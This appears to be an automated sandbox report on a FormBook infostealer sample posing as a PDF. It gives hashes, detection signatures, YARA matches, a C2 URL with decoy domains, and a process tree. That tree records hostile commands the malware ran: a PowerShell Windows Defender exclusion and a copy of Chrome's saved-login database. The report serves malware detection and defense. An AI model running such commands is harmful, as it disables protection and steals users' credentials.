Edit tour

Windows Analysis Report
Specification and Quantity Pdf.exe

Overview

General Information

Sample name:	Specification and Quantity Pdf.exe
Analysis ID:	1515401
MD5:	686fed0af9eebb2581701d4e08e9ff0b
SHA1:	3c9f400ba8c6fe7f35f20bca09e59d3bb8169035
SHA256:	219a330b7ae9807411d289f28169861fc748f50212ae2317278bfe155d89990f
Tags:	exeuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected FormBook malware

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Steal Google chrome login data

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Potential Browser Data Stealing

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: Use Short Name Path in Command Line

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Specification and Quantity Pdf.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\Specification and Quantity Pdf.exe" MD5: 686FED0AF9EEBB2581701D4E08E9FF0B)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7812 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8096 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

svchost.exe (PID: 7924 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

wmplayer.exe (PID: 7956 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)

explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

rundll32.exe (PID: 8156 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)

cmd.exe (PID: 1352 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 6192 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.playdoapp.online/n7ak/"], "decoy": ["wise-transfer.info", "jam-nins.com", "thebestsocialcrm.com", "majomeow222.com", "ancientshadowguilt.space", "gentleman-china.com", "parquemermoz.store", "taxuw.com", "sharqiyapaints.com", "libraryofkath.com", "1949wan.com", "synqr.net", "bitchessgirls.com", "btonu.cfd", "coding-bootcamps-16314.com", "leadership22-tdh.site", "maximsboutique.com", "irishsummertruffles.com", "sdnaqianchuan.com", "uyews.xyz", "mostvisitors.com", "prembug.com", "lebondtrip.com", "villavouno.com", "solanosotostudio.com", "pbx1.website", "littleeturtle.com", "supremeajock.biz", "turborings.run", "parkpeninsula.online", "goodstuff.tv", "17qld.com", "thehandycrewcompany.com", "alwaystuesdaytacos.com", "entribeworks.com", "susanboyleinfo.com", "volkovastyu.com", "tradingmoja.com", "germancompany-eg.com", "gameofgem.com", "hbdpcq.com", "budsdesigns.com", "sistemrizal.xyz", "395boulderbrookdr.com", "forounlock.com", "cp2967.com", "creatividadymedia.com", "marocquadchallenge.com", "tuktukwines.com", "tripskorea.com", "eyvonnesewingshop.com", "1690.biz", "perfectkick.website", "jreengineering.tech", "lilmeow.store", "ttjsdispatchingllc.com", "carltonellis.com", "redantholdings.com", "luxuryworkingfarms.com", "appsecintelligence.com", "studmate.online", "imogenbot.store", "netheerlandart.com", "bikelegalkentucky.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.3767102018.0000000010A5F000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xa22:$a2: pass 0xa28:$a3: email 0xa2f:$a4: login 0xa36:$a5: signin 0xa47:$a6: persistent 0xc1a:$r1: C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlog.ini
00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6ae0a1:$a1: 3C 30 50 4F 53 54 74 09 40 0x70a931:$a1: 3C 30 50 4F 53 54 74 09 40 0x84d901:$a1: 3C 30 50 4F 53 54 74 09 40 0x6c49f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x721280:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x864250:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x6b281f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x70f0af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x85207f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x6bd707:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x719f97:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x85cf67:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x6b1758:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6b19d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x70dfe8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x70e262:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x850fb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x851232:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6bd505:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x719d95:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x85cd65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6bcff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x719881:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x85c851:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6bd607:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x719e97:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x85ce67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x6bd77f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x71a00f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85cfdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x6b23ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x70ec7a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x851c4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6c0669:$sqlite3step: 68 34 1C 7B E1 0x6c077c:$sqlite3step: 68 34 1C 7B E1 0x71cef9:$sqlite3step: 68 34 1C 7B E1 0x71d00c:$sqlite3step: 68 34 1C 7B E1 0x85fec9:$sqlite3step: 68 34 1C 7B E1 0x85ffdc:$sqlite3step: 68 34 1C 7B E1 0x6c0698:$sqlite3text: 68 38 2A 90 C5 0x6c07bd:$sqlite3text: 68 38 2A 90 C5 0x71cf28:$sqlite3text: 68 38 2A 90 C5 0x71d04d:$sqlite3text: 68 38 2A 90 C5 0x85fef8:$sqlite3text: 68 38 2A 90 C5 0x86001d:$sqlite3text: 68 38 2A 90 C5 0x6c06ab:$sqlite3blob: 68 53 D8 7F 8C 0x6c07d3:$sqlite3blob: 68 53 D8 7F 8C 0x71cf3b:$sqlite3blob: 68 53 D8 7F 8C 0x71d063:$sqlite3blob: 68 53 D8 7F 8C 0x85ff0b:$sqlite3blob: 68 53 D8 7F 8C 0x860033:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Specification and Quantity Pdf.exe PID: 7692	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7b35c:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: svchost.exe PID: 7924	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x110:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: wmplayer.exe PID: 7956	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xc1947:$a1: 3C 30 50 4F 53 54 74 09 40 0x16567c:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: rundll32.exe PID: 8156	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10b5f9:$a1: 3C 30 50 4F 53 54 74 09 40 0x178b32:$a1: 3C 30 50 4F 53 54 74 09 40 0x1acda4:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 40 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
